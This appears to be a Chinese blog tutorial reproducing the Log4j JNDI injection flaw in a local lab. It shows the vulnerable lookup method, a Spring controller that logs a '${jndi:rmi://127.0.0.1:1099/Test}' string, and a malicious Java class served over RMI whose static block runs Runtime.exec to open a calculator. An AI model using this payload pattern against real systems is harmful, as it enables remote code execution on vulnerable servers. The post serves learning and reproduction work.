完整log4j漏洞复现

1.环境

log4j-core 2.7
log4j-api 2.7
jdk 1.8

2.核心要点

核心的漏洞代码在于org.apache.logging.log4j.core.lookup.StrSubstitutor 该类中,首先利用idea 全局搜索以下方法。


   protected String resolveVariable(final LogEvent event, final String variableName, final StringBuilder buf,
                                     final int startPos, final int endPos) {
        final StrLookup resolver = getVariableResolver();
        if (resolver == null) {
            return null;
        }
        return resolver.lookup(event, variableName);
    }

并在关键位置打断点
在这里插入图片描述
方法执行到该处才算成功。

3 .搭建攻击服务与被攻击服务

被攻击服务,其主要代码如下:

import org.apache.log4j.Logger;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.RequestMapping;

import javax.servlet.http.HttpServletResponse;

@Controller
@RequestMapping("Test")
public class TestController {
    Logger log = Logger.getLogger(TestController.class);

    @RequestMapping("/test")
    public String index(Model model, HttpServletResponse response) {
        log.info("${jndi:rmi://127.0.0.1:1099/Test}"); //指向rmi服务
        return "index";
    }
}

主要步骤: 攻击者服务需要一个web服务存放执行脚本,然后再用rmi指向该web服务。
利用Python开启一个简单的web服务,并放上攻击脚本,放在其目录下:
在这里插入图片描述
打开计算器的脚本:

public class MyServer {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"calc"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
           
        }
    }
}

再用rmi指向该服务
在这里插入图片描述

最后执行被攻击者的代码,可以通过web发起http请求:

在这里插入图片描述
主要看是否进入断点,最好不要同时引入logback.jar这个包,要不然跳不进断点。最终弹出计算器:

在这里插入图片描述
仅供学习交流!!!
参考:
[1]: https://www.cnblogs.com/wbo112/p/15690699.html
[2]: https://zhuanlan.zhihu.com/p/443640671

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值